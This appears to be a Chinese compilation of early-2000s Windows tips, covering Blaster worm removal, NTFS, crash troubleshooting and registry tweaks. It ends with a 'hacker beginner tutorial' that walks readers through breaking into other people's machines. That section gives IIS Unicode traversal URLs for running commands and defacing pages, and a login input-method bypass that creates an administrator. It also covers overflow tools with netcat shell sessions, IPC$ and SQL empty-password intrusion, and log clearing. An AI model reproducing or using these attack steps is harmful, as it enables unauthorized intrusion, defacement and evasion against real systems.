  Windows2000 Service Pack 4简体中文版下载地址http://download.microsoft.com/download/4/1/4/4140e2e0-0ad9-4438-ac52-da0e0429c0e6/w2ksp4_cn.exe
  3.下载专杀工具
  瑞星“冲击波(Worm.Blaster))”病毒专杀工具下载地址http://download.rising.com.cn/zsgj/ravzerg.exe
  金山“冲击波(Worm.Blaster))”病毒专杀工具下载地址http://www.duba.net/download/othertools/duba_sdbot.exe
  4.脱机杀毒
  断开网络连接,然后运行专杀工具,这些工具体积小巧,操作简单,按照提示操作即可。
  手工清除:
  如果想体验一下手工杀毒的乐趣,可以按以下步骤操作:
  1.中止进程
  按“Ctrl+Alt+Del”组合键,在“Windows 任务管理器”中选择“进程”选项卡,查找“msblast.exe”(或“teekids.exe”、“penis32.exe”),选中它,然后,点击下方的“结束进程”按钮。
  提示:如不能运行“Windows 任务管理器”,可以在“开始→运行”中输入“cmd”打开“命令提示符”窗口,输入以下命令“taskkill.exe /im msblast.exe”(或“taskkill.exe /im teekids.exe”、“taskkill.exe /im penis32.exe”)。
  2.删除病毒体
  依次点击“开始→搜索”,选择“所有文件和文件夹”选项,输入关键词“msblast.exe”,将查找目标定在操作系统所在分区。搜索完毕后,在“搜索结果”窗口将所找到的文件彻底删除。然后使用相同的方法,查找并删除“teekids.exe“和“penis32.exe”文件。
  提示:在Windows XP系统中,应首先禁用“系统还原”功能,方法是:右击“我的电脑”,选择“属性”,在“系统属性”中选择“系统还原”选项卡,勾选“在所有驱动器上关闭系统还原”即可。
  如不能运行“搜索”,可以在“开始→运行”中输入“cmd”打开“命令提示符” 窗口,输入以下命令:
  “del 系统盘符\winnt\system32\msblast.exe”(Windows 2000系统)或“del系统盘符\windows\system\msblast.exe”(Windows XP系统)
  3.修改注册表
  点击“开始→运行”,输入“regedit”打开“注册表编辑器”,依次找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”,删除“windows auto update=msblast.exe”(病毒变种可能会有不同的显示内容)。
  4.重新启动计算机
  重启计算机后,“冲击波”病毒就已经从系统中完全清除了。
  防 御:
  可以通过系统升级、优化网络设置和使用第三方软件的方法来增强系统的安全性能。
  系统升级防病毒
  安装针对“冲击波”的补丁后,怎样确认补丁已经正确安装呢?我们可以通过查看注册表的方法来确认,方法如下:在“开始→运行”中输入“regedit”,打开“注册表编辑器”,查看相应的注册表信息:
  “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980”(Windows 2000系统)
  “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980”(Windows XP系统)
  “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Window Server 2003\SP1\KB823980”(Windows Server 2003系统)
  禁用端口防病毒
  “冲击波”病毒是利用系统的135、137、138、139、445、593端口,以及UDP端口69(TFTP))和TCP端口4444入侵系统的,只要禁用了这些端口就能有效地防范此类病毒。
  1.手工设置
  手工禁用端口的方法如下(以Windows 2000为例):
  打开“控制面板”,双击“网络连接”,右击“本地连接”,选择“属性”,在“本地连接属性”窗口中,选择“Internet”协议,点击“高级”按钮,然后在“高级TCP/IP设置”窗口中选择“选项”选项卡,双击“TCP/IP筛选”即可进入设置窗口。选择“只允许”,则用户只能使用设定的端口,这样就可以达到禁用危险端口的目的。一般而言,如果我们的计算机只是工作站而不是服务器,就可以只开放如下端口:TCP:80,UDP:6,IP协议:17。
  提示:不同的应用程序可能会要求使用系统不同的端口,比如FTP软件需要用到TCP21端口等,请按照各程序的说明文件进行相应的设置。
  2.使用防火墙软件
  对普通用户而言,手工设置可能会比较困难,笔者建议使用专门的防火墙软件,如Norton Internet Security、金山网镖、瑞星个人防火墙、天网防火墙个人版等。
  启用Internet连接防火墙
  对于使用 Windows XP或Windows Server 2003的用户来说,系统内置的Internet连接防火墙就能有效地阻止来自Internet的入站RPC通信信息,从而免受此类病毒的影响。操作方法为:进入“开始→控制面板”,双击“网络连接”,右击“本地连接”,选择“属性”,在“属性”窗口中点击“高级”按钮,就可以看到“Internet 连接防火墙”,勾选“通过限制或阻止来自Internet的对此计算机的访问业保护我的计算机和网络”即可。
  禁用DCOM防病毒
  DCOM是一种能够使软件组件通过网络直接进行通信的协议。如果一台计算机是网络的一部分,则该计算机上的COM对象将能够通过DCOM网络协议与另一台计算机上的COM对象进行通信。通过禁用DCOM,可以帮助计算机防范“冲击波”,具体操作方法如下:
  在“开始→运行”中输入“Dcomcnfg.exe”,打开“组件服务”窗口;单击“控制台根节点”下的“组件服务”,再打开“计算机”子文件夹;然后右击“我的电脑”,选择“属性”(对于本地计算机),或者右击“计算机”文件夹,选择“新建→计算机”,输入计算机名称,再右击该计算机名称,然后选择“属性”(对于远程计算机);然后选择“默认属性”选项卡,取消“在这台计算机上启用分布式COM”复选框上的钩即可。
  提示:禁用DCOM会阻断该计算机上的对象与其他计算机上的对象之间的所有通信,请慎重选择。
  几点注意:
  1.安装专业的防火墙和防病毒软件,并激活“实时防护”功能,并且经常更新病毒库;
  2.激活系统的自动更新功能,及时下载安装最新的安全补丁,未雨绸缪;
  3.优化与系统安全相关的参数,修改部分缺省值,关闭或删除系统中不需要的服务;
  4.养成良好的网络安全观念,不访问不健康网站,不随意打开来历不明的邮件及附件,不要执行从Internet下载的未经杀毒处理的软件;
  5.尽量使用复杂的密码,提高计算机的安全系数;
  6.发现病毒时,应该迅速断开网络连接,隔离受感染的计算机。

五十七、磁盘格式的问题
1、什么是NTFS?

  想要了解NTFS,我们首先应该认识一下FAT。FAT(File Allocation Table)是“文件分配表”的意 思。对我们来说,它的意义在于对硬盘分区的管理。FAT16、FAT32、NTFS是目前最常见的三种文件系统。

  FAT16:我们以前用的DOS、Windows 95都使用FAT16文件系统,现在常用的Windows 98/2000/XP等系统均支持FAT16文件系统。它最大可以管理大到2GB的分区,但每个分区最多只能有65525个簇(簇是磁盘空间的配置单位)。随着硬盘或分区容量的增大,每个簇所占的空间将越来越大,从而导致硬盘空间的浪费。

  FAT32:随着大容量硬盘的出现,从Windows 98开始,FAT32开始流行。它是FAT16的增强版本,可以支持大到2TB(2048GB)的分区。FAT32使用的簇比FAT16小,从而有效地节约了硬盘空间。

  NTFS:微软Windows NT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的Windows 2000/XP的普及,很多个人用户开始用到了NTFS。NTFS也是以簇为单位来存储数据文件,但NTFS中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费,还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能,可为用户提供更高层次的安全保证。

  2、什么系统可以支持NTFS文件系统?

  只有Windows NT/2000/XP才能识别NTFS系统,Windows 9x/Me以及DOS等操作系统都不能支持、识别NTFS格式的磁盘。由于DOS系统不支持NTFS系统,所以最好不要将C:盘制作为NTFS系统,这样在系统崩溃后便于在DOS系统下修复。

  NTFS与操作系统支持情况表

  文件系统    支持的操作系统
  FAT16    windows 95/98/Me/NT/2000/XP Unix,Linux,DOS
  FAT32    windows 95/98/Me/2000/XP
  NTFS     windows nt/2000/XP

五十八、电脑死机故障分析

每个使用过电脑的人恐怕都遇到过死机现象,电脑的死机确实是一件很烦人的事,有时还会给您带来不小的损失,但是这个问题也确实是很复杂的,死机既有可能是硬件上的暇弊,也有可能是软件中的bug,当然还有可能就是您的“非法操作”。下面想就一些实例来具体问题具体分析一番:
  
显卡原因
  Q 一台电脑发生经常性的死机现象,启动电脑,会有三声报警声,显示器有时不能点亮,但主机工作正常,在设置成32位色彩后,死机更加频繁。为什么?
  A 造成以上情况死机的原因可能有两个:一个是显示卡散热不好造成的工作不正常,另一个原因是显卡和主板的兼容性不好。在设置成高位色后的死机,很可能是显卡显示功能比较弱,在更高位色的情况下保证不了原来的分辨率,看来这个问题主要是出自显卡上。
  

电源原因
  Q 电脑一直使用很好,但最近一段时间偶尔出现启动过程中的死机,并不是每一次都这样,有时候需要两三次才能顺利地启动。为什么?
  A 由于以前使用情况一直很好,一般可以排除是硬件上的兼容性问题,而在启动过程中的死机,屏幕上又没有给出相关的信息,所以也不很像是软件的问题,所以最有可能就是由于电源的老化或者超负荷造成的,一般更换电源检验一下就可以。
  

驱动程序原因
  Q 在升级Win 98过程中,出现“按立即启动按钮,计算机将立即重新启动,否则15秒后计算机将自动重新启动。”对话框,但启动后,蓝屏死机。为什么?
  A 由于是在安装系统中的死机,多半是由于硬件设备的冲突造成的,可以先将除显卡以外的其他扩展插卡拔掉,然后再重新安装Win 98,如仍出现上述情况,有可能是Win 98系统对原显卡的驱动程序不兼容造成的,可以在开机时选择进入安全模式,然后在控制面板中升级显卡的驱动程序。
  

DOS启动原因
  Q 电脑在启动后出现“Starting Windows 98”信息时,随即死机。为什么?
  A 此种情况下的死机,很可能是由于Win 98的DOS启动部分受到破坏所至,因为此时还尚未进入到Win 98的系统中,解决此问题需要用到Win 98的启动软盘,用启动盘来重新启动电脑后,然后在DOS状态下输入“sys c:”命令,这样可以修复硬盘中的DOS引导系统,问题应该可以解决,但需要注意的是,启动盘必须是用与当前操作系统版本一致的,否则将破坏Windows系统。
  

虚拟内存原因
  Q 在Win 9x下运行大型的应用程序时,出现硬盘灯狂闪,随即就死机了。为什么?
  A 这是我们经常会遇到的一种死机情况,这个问题大多是和设置的虚拟内存有关。如果本身的内存就比较小,而又运行了大型的应用程序,这时就需要有较大的虚拟内存,但如果这时的虚拟内存恰恰不够了,就会造成上述的死机了。所以建议您最好是将虚拟内存的容量设置得稍大一点,并且经常删除一些临时的虚拟文件。
  

注册表原因
  Q 关于Win 9x注册表损坏而引起的死机现象。怎样解决?
  A Windows系统中的注册表是一个很危险的地方,一般情况下不要修改。出现误删的问题,可以将备份的注册表恢复过来。具体方法是启动电脑到纯DOS状态下,然后进入到Windows的目录下,执行一下命令:
  attrib -h -r -s system.da0
  atttib -h -r -s user.da0
  copy system.da0 system.dat
  copy user.da0 user.dat
  最后重新启动电脑。
  

引导程序原因
  Q 电脑在开机自检后,在屏幕上显示“No ROM Basic,System Halted”信息后死机,硬盘等也不再闪烁。为什么?
  A 造成这一故障的原因是硬盘的引导程序破坏或者是受病毒侵害,还有可能是主引导区的最后两个字节“55AAH”被改写,因为这两个字节一旦被改写,那么系统就不再认为有硬盘存在了,所以操作系统也就无法启动了。解决方法是用软盘启动电脑,在DOS状态下,执行“FDISK/MMR"命令,这样就可以使正确的主引导程序和结束标识覆盖在硬盘的主引导区上。
  

安装操作系统原因
  Q 在电脑启动时,屏幕上出现了“Error Loading Operation System”的相关信息,然后就死机了。为什么?
  A 以上显示信息的意思是:装载操作系统错误。这是在读取分区引导扇区出错时才提示的。可能是因为:
  1、分区表指示的分区起始地址不正确。
  2、分区引导扇区所在磁道的磁道标志和扇区ID损坏,找不到指定的扇区。
  3、驱动器读电路故障,但这种情况比较少见,多数是随机性读错误,因为系统引导进行到此处,应该说已正确地读出了一个主引导扇区。
  

解决上述的问题,需要借助像诺顿的磁盘医生NDD之类的修复软件来回复硬盘的分区表

五十九、更改IE的默认搜索引擎

  问:我使用的系统是Windows XP。我用超级兔子IE保护器的功能把搜索引擎改为百度http://www.baidu.com/baidu,可现在超级兔子IE保护器显示的搜索引擎是百度,但实际使用的还是微软的搜索引擎。请问我该怎么办?

  答:首先纠正一下,百度的搜索引擎http://www.baidu.com。在注册表编辑器中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将这两个键值修改为http://www.baidu.com。如果由于某种原因确实不能修改,你可以http://bar.baidu.com安装一个百度搜霸或IE搜索伴侣。它会自动将IE的默认搜索引擎更改为百度的搜索引擎。


六十、更改临时文件夹的路径

??问:我使用的系统为Windows XP,我想把系统临时文件(Temp文件)存放区由C盘移到其他分区(如D盘),请问该如何操作?

??答:在“我的电脑”上点鼠标右键,选择“属性”,然后进入高级选项,点“环境变量”,在“系统变量”下拉菜单中找到“TEMP”、“TMP”这两项,分别编辑,将变量值设为你需要改变的路径(例如D:\temp),注意两项改为相同路径,然后在D盘上建立一个temp目录,最后重启计算机即可。

六十一、更改屏幕保护程序关联方式

  问:最近不知道做了什么操作,双击电脑上的屏幕保护程序文件(扩展名为SCR)后,会自动用写字板打开。请问如何正确打开屏幕保护程序呢?

  答:屏幕保护程序是由系统直接调用的。如果你想修改为默认的模式,打开注册表编辑器,找到HKEY_CLASSES_ROOT\scrfile\shell\open\command,双击右边窗格里面的默认值,然后输入:“"%1" /S”(不包括全角引号,注意%1是被半角引号保护起来的),确定;然后找到HKEY_CLASSES_ROOT\.scr,确认右边的默认值是“scrfile”(不包括引号)即可。

六十二、调整调出输入法的顺序

  1.修改注册表法:
  在注册表编辑器(在“开始/运行”对话框中输入“REGEDIT”)中展开:“HKEY_CURRENT_USER\Keyboard Layout\Preload”分支,可看到名为”1”、”2”、”3”…的文件夹,它们分别顺序对应输入法菜单中的各项输入法。假设当前输入法菜单中,全拼对应的文件名是2,智能ABC对应的文件名是5,可先将5改为6(点右键选“重命名”即可修改),然后将2改为5,再将6改为2,最后重启系统。可看到输入法菜单中全拼和智能ABC的位置调换了。(辽宁 王岩)
  2.快捷键法:
  打开“控制面板”,双击“输入法”,启动“输入法属性”对话框,选择“热键”选项卡。通过“基本键”和“组合键”为各输入法定义不同的快捷键。如将“王码五笔输入法”定义快捷键为“Ctrl+Alt+5”,以后要使用五笔输入法,按下“Ctrl+Alt+5”组合键即可。此法虽未实际调整输入法位置,但在你心中却有一明了的顺序,可让你随意调出。
  注:此方法只适合Win9X/2000。
  3.软件法
  我们可以用《Windows优化大师》或《超级魔法兔子》等软件来调整。运行《Windows优化大师》后,进入“系统个性设置”选项卡中的“输入法顺序”,选中任一输入法后,通过右边的“向上”、“向下”按键,调整到合适位置即可;同样,“超级魔法兔子”也用一个“输入法”选项供调整。(重庆 安顺)
  4.重装法
  重新添加输入法以达到调整顺序的目的,具体方法:在控制面板中找到“输入法”图标双击打开输入法,找到需要调整的输入法,把它前面的输入法依次删除(这里删除并不是真的把输入法从电脑中删除,只是把它清出输入法列表)再按想要的顺序依次地添加上,注意先安装的输入法会排在前面。这样输入法的顺序就得到了调整。

六十三、更改系统源文件途径

在开始-运行输入regedit进入注册表,依次展开到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup。更改右边窗口里的Installation Sources、ServicePackSourcePath、SourcePath三个键值为新的途径。
电脑报内容:
1.在Windows98中:点击开始菜单,进入运行对话框,在对话框中输入“regedit”,打开注册表编辑器。打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup主键并选中它,双击右边窗口中的“SourcePath”,在键值中输入需要的路径即可。
  2.在Windows NT/2000/XP中:打开HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Setup主键并选中它,双击右边窗口中的“SourcePath”,在键值中输入需要的路径即可。

六十四、关闭WinXP的错误报告

  右键单击“我的电脑”,打开“系统属性”窗口,选择“高级”标签,单击“错误报告”,选择“禁用错误报告”,以后Windows就不会询问你是否要发送报告了,只会告诉你程序出错需要关闭。

六十五、快速关闭没有响应的程序

在“开始→运行”框中输入“Regedit”,打开“注册表编辑器”,在HKEY-CURRENT-USER下新建串值Waittokillapptimeout,将其键值设为1000(ms)或更小。
允许强行关机
进入HEKY-USERS\.DEFAULT\Control Panel\desktop,创建一个字符串“AutoEndTask”,将其键值设为“1”即可。
对于真正的死机,一般只能两次按下 “Ctrl+Alt+Del” 组合键或按主机箱上的“Reset”键(因为消耗资源较少,故前者优先)来重新启动了。
系统死机时自动重新启动
进入HKEY_LOCAL_MACHINE\System\CurrentControlSet\C-o-n-trol\CrashControl主键,在右边的窗口中修改“AutoReboot”,将其的键值改为“1”。

六十六、黑客入门教程

由于网上很多朋友问我怎么入侵别人的机器,所以整理了一些我认为容易学的漏洞入侵方法,希望能给
初学者一些帮助,下面讲的内容很简单,高手就不用浪费时间看了,:)
(1) UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围
的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个
框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255
这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看
到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,
很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞,
目标有了,我们马上打开浏览器。在网址栏里输入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a Inetpub
2002-01-19 10:37p MSSQL7
2002-03-09 04:22p Program Files
2002-01-23 06:21p WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好,我们成功看到了机器里的C盘了。
我们在浏览器里输入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。
我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
我们用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功,只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文
就行了。
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
(2) Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法
,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择
“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能
发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找
到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” —“目标”
—c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”
(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状
态,但guest用户已被激活。)然后重复操作上面的,在 “属性” —— “目标”—— c:\winnt\system32\net.exe
后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”
将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,
已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。
(3) idq溢出漏洞
要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。
首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的
IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作
系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode
成功的提示了,然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>
看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。
(4)IDA溢出漏洞
所用程序:idahack
进入MS-DOS方式(假设idq.exe在c:\下)
c:\idahack.exe
运行参数:c:\idahack
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14
c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck 
好,现在你可以telnet它的80端口了,我们用NC来连接。
C:\nc 127.0.0.1 80
Microsoft Windows 2000 [Version 5.00.2195]
(C)版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。
(5).printer漏洞
这个漏洞,我们用两个程序来入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
usage: D:\IIS5HACK.EXE
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9
c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80
connecting...
sending...
Now you can telnet to 3739 port
good luck :)
溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
OK,我们又成功取得system权限!玩吧。
(6)139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。
假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的
情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?
NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C,D,E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,
点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!
双击就可以进入,其使用的方法和网上领居的一样。
(7)IPC入侵
所有程序:流光
开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的
IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,
这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”
前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”
就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以
全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测
出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:
net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
copy icmd.exe file://对方ip/admin$   || admin$是对方的winnt目录
net time file://对方IP/ || 看看对方的本地时间
at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序
telnet 对方ip 端口
我们也可以改网页:
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或
default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"
覆盖原文件这样就行了,简单吧?
日志清除,断开连接 :
我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。
然后在断开连接:net use file://ip/ipc$ /delete
(8)超管SA空密码漏洞
使用的工具:流光IV
启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”
,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” —— SQL远程命令(或者Ctrl+Q),
填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。
net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板:
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe:
copy srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe:
copy ntlm.exe \\127.0.0.1\admin$\system32
启动服务:
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用
at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入:
telnet X.X.X.X 99
然后我们要启动NTLM.exe:
在telnet状态下直接输入ntlm回车。
显示:windows 2000 telnet dump,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)
再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,
依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧?
